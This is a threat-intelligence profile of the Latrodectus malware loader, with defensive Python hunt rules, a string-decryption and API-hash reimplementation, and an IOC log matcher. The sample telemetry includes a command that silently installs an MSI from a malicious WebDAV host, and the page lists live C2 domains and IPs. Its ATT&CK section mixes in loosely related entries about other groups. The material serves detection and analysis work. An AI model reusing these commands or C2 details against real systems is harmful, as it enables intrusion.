Latrodectus
Latrodectus is a malware loader/downloader first observed in late 2023 and publicly documented in 2024. It is also tracked as IceNova Backdoor, Unidentified 111, BlackWidow, and Icenova. Multiple sources describe it as a likely successor to, or evolution of, IcedID and attribute its development to IcedID-associated operators. Reporting links it to campaigns associated with TA577, TA578, Storm-0249, Trickbot/WIZARD SPIDER, Conti, and LUNAR SPIDER, and to activity overlapping with Rhysida operations. It is characterized as an initial-access loader that bridges delivery to post-exploitation tooling and follow-on payloads, including Brute Ratel C4, Rhadamanthys, and, in at least one reported infection, LummaStealer.
Observed delivery vectors include phishing and reply-chain (thread-hijacking) emails with malicious attachments, malicious spam campaigns using JavaScript files, tax-themed phishing, compromised websites, malvertising, SEO poisoning, fake CAPTCHA/ClickFix lures, and MSI-based infection chains. One described chain used a JavaScript downloader to map a remote WebDAV share at \\wireoneinternet.info@80\share\ (the host@80 form is the Windows WebClient UNC syntax for WebDAV over HTTP) and silently install slack.msi via msiexec.exe. Another campaign used a ClickFix lure to trick users into executing a PowerShell command that downloaded Latrodectus v2.3. Distribution as a plain malicious email attachment that the recipient is induced to open is also reported.
Directly described capabilities include downloading and deploying additional malware, executing commands, collecting and exfiltrating encrypted system information to command-and-control servers, maintaining persistence through scheduled tasks, and communicating with C2 over HTTP POST with Base64-encoded request bodies. Latrodectus has used WMI in malicious email infection chains to facilitate installation of remotely hosted files. Technical analyses state that it gathers host information including computer name, user name, and network adapter details, creates a mutex to detect prior infection, copies itself into AppData\Roaming\Custom_update as Update_<random>.dll, deletes the original payload path, and relaunches itself with rundll32 using exports such as homi or scub. One report describes persistence via a Windows Run key and another via a scheduled task; both mechanisms are reported, so hunting should cover both.
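The delivery chain and host behaviour described above translate directly into process-telemetry hunts. The Python below is an added example, not code from the page or from any vendor report: it runs four rules over a handful of constructed Sysmon-style process-creation events. The events, user names, DLL suffix and benign rows are invented for the demonstration; only the share name, staging folder, file-name pattern and export names (homi, scub, and the MSI-bundled fin) come from the reporting on this page.

```python
import re
from typing import Dict, List

# Export names seen in reporting: homi and scub for the relaunched DLL, fin for the MSI-bundled DLL.
KNOWN_EXPORTS = {"homi", "scub", "fin"}

# WebDAV UNC form \\host@80\share\ (or @443 / @SSL); msiexec pulling an MSI from it is the reported chain.
WEBDAV_UNC = re.compile(r"\\\\[\w.-]+@(?:80|443|ssl)\\[^\s]*\.msi", re.IGNORECASE)
# Reported staging location and file-name pattern of the relaunched loader DLL.
CUSTOM_UPDATE_DLL = re.compile(r"\\AppData\\Roaming\\Custom_update\\Update_[^\\\s,]+\.dll", re.IGNORECASE)
# rundll32 invocation "dll,export" or "dll, export".
RUNDLL_EXPORT = re.compile(r"\.dll\s*,\s*(\w+)", re.IGNORECASE)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def _basename(win_path: str) -> str:
    """Last component of a Windows path, lower-cased (os.path would mishandle backslashes on Linux)."""
    return win_path.rsplit("\\", 1)[-1].lower()


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the names of the rules a single process-creation event triggers, in rule order."""
    image = _basename(event["image"])
    parent = _basename(event["parent"])
    cmd = event["cmdline"]
    hits: List[str] = []
    if image == "msiexec.exe" and WEBDAV_UNC.search(cmd):
        hits.append("msiexec_install_from_webdav_share")
    if image == "msiexec.exe" and parent in SCRIPT_HOSTS:
        hits.append("script_host_spawned_msiexec")
    if image == "rundll32.exe":
        if CUSTOM_UPDATE_DLL.search(cmd):
            hits.append("rundll32_custom_update_dll")
        m = RUNDLL_EXPORT.search(cmd)
        if m and m.group(1).lower() in KNOWN_EXPORTS:
            hits.append("rundll32_known_latrodectus_export")
    return hits


def hunt(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Run every rule over every event; one record per (event, rule) match."""
    findings = []
    for ev in events:
        for rule in evaluate(ev):
            findings.append({"rule": rule, "cmdline": ev["cmdline"]})
    return findings


# Constructed events (hypothetical telemetry, not from a real incident).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\Downloads\Invoice_4471.js"',
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i \\wireoneinternet.info@80\share\slack.msi /qn",
     "parent": r"C:\Windows\System32\wscript.exe"},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\alice\AppData\Roaming\Custom_update\Update_9f3a1c.dll, homi",
     "parent": r"C:\Windows\System32\msiexec.exe"},
    # Benign rundll32 and msiexec rows, to show the rules do not fire on ordinary use.
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Users\bob\Downloads\7z2301-x64.msi /qn",
     "parent": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f['rule']:38} {f['cmdline']}")
```

The WebDAV rule is the most portable of the four: the host name rotates, but msiexec reading an .msi over a host@80 UNC path is rare in most estates and is the step the reported JavaScript stage depends on.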
The malware uses runtime string decryption and API hashing, so neither its strings nor its imports are visible to static analysis. Published reverse-engineering analysis describes a custom XOR-based string decryption routine in which the first and fifth bytes determine the encrypted block length, the first six bytes act as a control header, and the subsequent bytes are decrypted with an incrementing XOR key derived from the first byte. Another technical analysis states that the main DLL reconstructs its imports at runtime using CRC32-based API hashing. Sandbox evasion and other anti-analysis behaviour are also reported. Decrypting the string table and labelling the hashed imports are therefore the first steps in triaging a sample.
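To make the two evasion techniques concrete, here is an added Python example (mine, not code from any published analysis and not the malware's own routine). It implements the string layout as the paragraph describes it, plus a CRC32 lookup table of the kind an analyst builds to label hashed imports. Assumptions are marked in the code: the page does not say what header bytes 1 to 3 and 5 hold, so they are zero here, and the hash is standard zlib CRC32, which a given build may vary. The sample blob is constructed by the example's own encoder.

```python
import zlib
from typing import Dict, Iterable, Optional


def encrypt_string(plaintext: bytes, key: int) -> bytes:
    """Build a blob in the assumed layout (inverse of decrypt_string, for constructing test data).

    byte 0    : XOR key seed
    bytes 1-3 : reserved, zero here (the page does not specify them; assumption)
    byte 4    : length XOR key seed  ("first and fifth bytes determine the length")
    byte 5    : reserved, zero here (assumption)
    bytes 6.. : plaintext[i] XOR ((key + i) & 0xFF)  (incrementing key derived from byte 0)
    """
    if not 0 <= key <= 0xFF or len(plaintext) > 0xFF:
        raise ValueError("key must be one byte and plaintext at most 255 bytes in this layout")
    header = bytes([key, 0, 0, 0, len(plaintext) ^ key, 0])
    body = bytes(b ^ ((key + i) & 0xFF) for i, b in enumerate(plaintext))
    return header + body


def decrypt_string(blob: bytes) -> bytes:
    """Decrypt one block: 6-byte control header, then length bytes XORed with an incrementing key."""
    if len(blob) < 6:
        raise ValueError("blob shorter than the 6-byte control header")
    key = blob[0]
    length = blob[4] ^ key
    body = blob[6:6 + length]
    if len(body) != length:
        raise ValueError(f"truncated block: header says {length} bytes, {len(body)} present")
    return bytes(b ^ ((key + i) & 0xFF) for i, b in enumerate(body))


def api_hash(name: str) -> int:
    """Standard CRC32 of the ASCII export name (assumption: a real build may tweak the polynomial or seed)."""
    return zlib.crc32(name.encode("ascii")) & 0xFFFFFFFF


def build_hash_table(names: Iterable[str]) -> Dict[int, str]:
    """Precompute hash -> name for the exports you expect, so hashes found in the binary can be labelled."""
    return {api_hash(n): n for n in names}


def resolve(hash_value: int, table: Dict[int, str]) -> Optional[str]:
    return table.get(hash_value)


# Constructed sample blob; the plaintext is one of the C2 URLs listed on this page.
SAMPLE_BLOB = encrypt_string(b"https://titnovacrion.top/live/", 0x3C)

if __name__ == "__main__":
    print(SAMPLE_BLOB.hex())
    print(decrypt_string(SAMPLE_BLOB).decode())
    table = build_hash_table(["VirtualAlloc", "CreateMutexW", "GetAdaptersInfo", "GetComputerNameW"])
    for h, n in table.items():
        print(f"{h:08x} {n}")
```

In practice the analyst loops decrypt_string over every blob the binary's decryption stub references and extends the export list (kernel32, advapi32, iphlpapi, wininet and friends) until every hash in the import-resolution routine is labelled; any hash that stays unresolved is a hint that the CRC32 variant differs from the standard one.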
Explicitly reported C2 and infrastructure details include communication with https://titnovacrion.top/live/ and https://skinnyjeanso.com/live/, use of attacker-controlled domains in ClickFix campaigns, and HTTP communications carrying Base64-encoded data. Additional reporting ties Latrodectus infrastructure to daily-rotating pseudo-random .top domains on 45.61.136.30, to domains registered through NICENIC, and to phishing infrastructure on 193.106.174.218 that uses HTTP 302 redirects. Latrodectus-related infrastructure has also been seen on Russian hosting and on malicious infrastructure associated with AS202412 (OMEGATECH).
Reported targeting includes financial-sector organizations and broader enterprise victims reached through phishing and web-based social engineering. Related campaigns used tax-themed lures, invoice/payment themes, and fake verification or CAPTCHA prompts. High-confidence indicators include wireoneinternet.info, titnovacrion.top, skinnyjeanso.com, jkbarmossen.com, statifaronta.com, 45.61.136.30, 193.106.174.218, and sample hashes such as fad25892e5179a346cdbdbba1e40f53bd6366806d32b57fa4d7946ebe9ae8621, 65da6d9f781ff5fc2865b8850cfa64993b36f00151387fdce25859781c1eb711, b9dbe9649c761b0eee38419ac39dcd7e90486ee34cd0eb56adde6b2f645f2960, and 17014299f399f71d1d6bed136b8c624a366b222166e692522d14e2bba70bb79f. Because the .top domains rotate daily, a match on a listed domain confirms an infection but a miss does not rule one out; the shared IPs and the POST-to-/live/ behaviour are the longer-lived signals.
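As an added example (not the page's or any vendor's tooling), the Python below matches the indicators listed above against a few constructed proxy-log lines and layers on the behavioural signal from the C2 section: an HTTP POST to a /live/ path whose body is Base64. The log format, internal addresses and non-IOC host names are invented for the demonstration; only the domains, IPs and SHA-256 hashes come from this page.

```python
import base64
import binascii
import re
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# Indicators listed on this page.
IOC_DOMAINS = {"wireoneinternet.info", "titnovacrion.top", "skinnyjeanso.com",
               "jkbarmossen.com", "statifaronta.com"}
IOC_IPS = {"45.61.136.30", "193.106.174.218"}
IOC_SHA256 = {
    "fad25892e5179a346cdbdbba1e40f53bd6366806d32b57fa4d7946ebe9ae8621",
    "65da6d9f781ff5fc2865b8850cfa64993b36f00151387fdce25859781c1eb711",
    "b9dbe9649c761b0eee38419ac39dcd7e90486ee34cd0eb56adde6b2f645f2960",
    "17014299f399f71d1d6bed136b8c624a366b222166e692522d14e2bba70bb79f",
}
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def looks_base64(body: str) -> bool:
    """True when the body is non-trivial, alphabet-clean, 4-aligned and actually decodes."""
    if len(body) < 8 or len(body) % 4 or not B64_RE.match(body):
        return False
    try:
        base64.b64decode(body, validate=True)
        return True
    except (binascii.Error, ValueError):
        return False


def domain_hit(host: Optional[str]) -> Optional[str]:
    """Return the matching IOC domain for an exact or subdomain match, else None."""
    host = (host or "").lower().rstrip(".")
    for d in IOC_DOMAINS:
        if host == d or host.endswith("." + d):
            return d
    return None


def match_hash(sha256: str) -> bool:
    return sha256.strip().lower() in IOC_SHA256


def inspect_line(line: str) -> List[str]:
    """Constructed log format: timestamp src_ip dst_ip method url status body ('-' when empty)."""
    _ts, _src, dst, method, url, _status, body = line.split(maxsplit=6)
    parts = urlsplit(url)
    reasons: List[str] = []
    d = domain_hit(parts.hostname)
    if d:
        reasons.append(f"ioc_domain:{d}")
    if dst in IOC_IPS:
        reasons.append(f"ioc_ip:{dst}")
    # Behavioural signal from the C2 section: POST to /live/ with a Base64 request body.
    if method == "POST" and parts.path.rstrip("/").endswith("/live") and looks_base64(body):
        reasons.append("post_live_base64_body")
    return reasons


def hunt(log_text: str) -> List[Dict]:
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        if line.strip():
            reasons = inspect_line(line)
            if reasons:
                findings.append({"line": n, "reasons": reasons})
    return findings


# Constructed proxy log (hypothetical traffic; RFC 2606 names stand in for benign hosts).
SAMPLE_LOG = """\
2024-05-02T10:01:03Z 10.0.0.21 45.61.136.30 POST https://titnovacrion.top/live/ 200 eyJob3N0IjoiV0tTLTAxIn0=
2024-05-02T10:01:09Z 10.0.0.21 203.0.113.7 POST https://example.org/live/ 200 ZmllbGQ9MSZhYz0y
2024-05-02T10:02:15Z 10.0.0.44 198.51.100.9 GET https://update.example.com/check 304 -
2024-05-02T10:03:40Z 10.0.0.21 193.106.174.218 GET http://hr-docs.example.net/tax-form 302 -
2024-05-02T10:04:02Z 10.0.0.50 198.51.100.20 POST https://api.example.com/v1/login 200 user=bob&pw=x
"""

if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f"line {f['line']}: {', '.join(f['reasons'])}")
```

Line 2 of the sample is the interesting one: no listed indicator matches, but the POST-to-/live/-with-Base64 shape still fires, which is the kind of hit that catches a freshly rotated .top domain before it reaches any feed. Treat it as a triage lead rather than a verdict and pivot on the destination IP and the source host's process telemetry.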
Vulnerabilities exploited
1 CVE correlated with this family across public research and vendor advisories.
Groups observed using it
10 distinct threat actors attributed by public researchers.
Earlier this April, the Redmond-based company warned of several phishing campaigns leveraging tax-related themes to deploy malware such as Latrodectus, AHKBot, GuLoader, and BruteRatel C4 (BRc4). The phishing pages, it added, were delivered via RaccoonO365, with one such campaign attributed to an initial access broker called Storm-0249.
Proofpoint first observed new malware named Latrodectus appear in email threat campaigns in late November 2023. Latrodectus is an up-and-coming downloader with various sandbox evasion functionality.
Latrodectus, also known as IceNova Backdoor ... is a family of malware that has been observed lately in campaigns linked to groups such as Trickbot (WIZARD SPIDER) and Conti (and potentially, in ransomware deliveries), in addition to being attributed to developers from IcedID. Therefore, Latrodectus has been highlighted as a potential threat and is used as a loader for other malware.
The tweet details a Latrodectus infection leveraging phishing links to redirect victims to a javascript file, which ultimately loads LummaStealer Malware.
LUNAR SPIDER’s recent campaign used Latrodectus, a heavily obfuscated JavaScript loader, to deliver Brute Ratel C4 payloads targeting the financial sector.
Bumblebee and Latrodectus, which are both malware loaders, are designed to steal personal data, along with downloading and executing additional payloads onto compromised hosts.
In addition to OysterLoader, Expel discovered the Rhysida threat actors were also using Latrodectus malware in its campaign...
Techniques & procedures
32 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
3 techniques
Campaigns using RaccoonO365 have been active since September 2024. These attacks typically mimic trusted brands like Microsoft, DocuSign, SharePoint, Adobe, and Maersk in fraudulent emails, tricking recipients into clicking on lookalike pages that are designed to capture victims' Microsoft 365 usernames and passwords.
Latrodectus has used JavaScript files as part of its infection chain during malicious spam email campaigns. Saint Bear has delivered malicious Microsoft Office files containing an embedded JavaScript object that would, on execution, download and execute OutSteel and Saint Bot.
On 28 November 2023, Proofpoint observed the last TA577 Latrodectus campaign. The campaign began with thread-hijacked messages that contained URLs leading to either zipped JavaScript files or zipped ISO files.
This actor typically uses contact forms to initiate a conversation with a target.
Execution
6 techniques
The content repeatedly describes threat actors and malware using WMI/WMIC/wmiexec for remote execution, lateral movement, discovery, persistence, and administrative actions; e.g., 'APT41 used WMI in several ways, including for execution of commands via WMIEXEC as well as for persistence via PowerSploit' and 'Scattered Spider used Windows Management Instrumentation (WMI) to move laterally via Impacket.'
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
During the 2016 Ukraine Electric Power Attack, Sandworm Team used the xp_cmdshell command in MS-SQL. During the 2025 Poland Wiper Attacks, the adversaries leveraged PsExec to run cmd.exe commands on multiple victim machines. Numerous malware families and groups are described as using cmd.exe, cmd /c, Windows command shell, or command-line interfaces to execute commands, payloads, reconnaissance, persistence, cleanup, and ransomware actions.
AppleSeed has the ability to use JavaScript to execute PowerShell. APT32 has used JavaScript for drive-by downloads and C2 communications. Astaroth uses JavaScript to perform its core functionalities.
The content repeatedly describes victims being lured into opening malicious attachments, enabling macros, launching installers, clicking embedded files/links, or otherwise directly executing malicious content.
Persistence
3 techniques
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
Across the content, malware repeatedly 'adds Registry Run keys', 'creates Registry entries', 'modifies the Windows Registry', or 'overwrites registry keys' to maintain persistence.
The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, .lnk files, or .bat files in the Windows Startup folder.
Privilege Escalation
2 techniques
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, .lnk files, or .bat files in the Windows Startup folder.
Stealth
10 techniques
The content repeatedly describes payloads, strings, configuration files, scripts, URLs, and binaries being obfuscated or encoded using Base64, XOR, RC4, AES, RSA, hex encoding, custom algorithms, and other methods across many malware families and threat actors.
Latrodectus resolves Windows API functions dynamically by hash rather than through a static import table.
During the 2016 Ukraine Electric Power Attack, DLLs and EXEs with filenames associated with common electric power sector protocols were used to masquerade files.
Many entries explicitly describe deleting artifacts 'to cover tracks,' 'evade detection,' 'remove evidence,' 'reduce their footprint,' or as part of 'post-intrusion cleanup process.' Examples include APT28 deleting files to cover tracks, FIN5 using SDelete to clean up the environment, and Dragonfly deleting operational files as part of cleanup.
The content repeatedly describes threat actors and malware deleting files, tools, scripts, logs, droppers, staged data, and artifacts from compromised systems to cover tracks, remove evidence, or self-delete.
The content repeatedly describes malware and threat actors decoding, decrypting, or deobfuscating payloads, strings, configuration data, commands, and C2 traffic prior to execution or use, e.g., 'APT28 macro uses the command certutil -decode to decode contents of a .txt file storing the base64 encoded payload' and 'Action RAT can use Base64 to decode actor-controlled C2 server communications.'
The MSI executed the bundled DLL with the export "fin" to run Latrodectus.
If this JavaScript was executed, it called MSIEXEC to run an MSI from a WebDAV share.
Defense Impairment
1 technique
Discovery
6 techniques
The content repeatedly describes malware and threat actors collecting usernames, identifying logged-in users, running whoami/query user/quser, checking admin status, and enumerating user sessions.
The content repeatedly describes malware and threat actors obtaining lists of running processes, using utilities such as tasklist, ps, WMI, Get-Process, CreateToolhelp32Snapshot, EnumProcesses, and similar APIs/commands to enumerate active processes on victim systems.
The content repeatedly describes malware and threat actors collecting host details such as OS version, hostname, architecture, CPU, memory, BIOS, domain, language, and other configuration data; e.g., "APT41 uses multiple built-in commands such as systeminfo and net config Workstation to enumerate victim system basic configuration information."
cmd_get_desktop_items (command ID 2): get the filenames of files on the desktop.
Collection
1 technique
The content repeatedly describes threat actors and malware collecting, stealing, identifying, copying, or staging files, documents, credentials, logs, databases, and other information from compromised hosts or local systems.
Command and Control
5 techniques
BS2005 uses Base64 encoding for communication in the message body of an HTTP request... Helminth encodes data with base64 and sends it via the "Cookie" field of HTTP requests. For C2 over DNS, Helminth converts ASCII characters into their hexadecimal values... RDAT can communicate with the C2 via base32-encoded subdomains.
The content repeatedly describes threat actors, malware, and campaigns using HTTP and/or HTTPS for command and control, including examples such as BlackEnergy communicating with C2 over HTTP POST requests and many other families using HTTP/S for C2.
The commands Latrodectus supports currently (command ID, then description):
cmd_exec_exe (12): execute an executable.
cmd_exec_dll (13): execute a DLL with a given export.
cmd_run_icedid (18): download bp.dat and execute it.
C2 traffic from ADVSTORESHELL is encrypted, then encoded with Base64 encoding... APT19 HTTP malware variant used Base64 to encode communications to the C2 server... APT33 has used base64 to encode command and control traffic.
On 15 December 2023, Proofpoint observed TA578 deliver the Latrodectus downloader via a DanaBot infection.
Exfiltration
1 technique
ADVSTORESHELL exfiltrates data over the same channel used for C2... Agrius exfiltrated staged data using tools such as Putty and WinSCP, communicating with command and control servers... numerous malware and groups sent victim data, files, credentials, or host information over existing C2 channels.
IOCs tracked for this family
221 indicators attributed across vendor reports, sandbox runs, and researcher write-ups, covering IPs, domains and DNS infrastructure, file hashes (MD5, SHA-1, SHA-256), and other indicator types from public reporting.
Recent activity
73 sources tracked across advisories, community write-ups, and news.
Malware delivered via a fake CAPTCHA ClickFix lure that tricks users into running a PowerShell command, after which it communicates with attacker-controlled domains.
Referenced as a comparable loader-for-hire occupying the same operational niche as MintsLoader.
Loader malware family identified as using infrastructure within the same subnet.
A stage-2 payload and active C2 framework delivered after IcedID infection. It uses rotating .top domains on shared infrastructure, maintains persistent beaconing, and is described as the current evolution/successor of the operator's IcedID toolkit.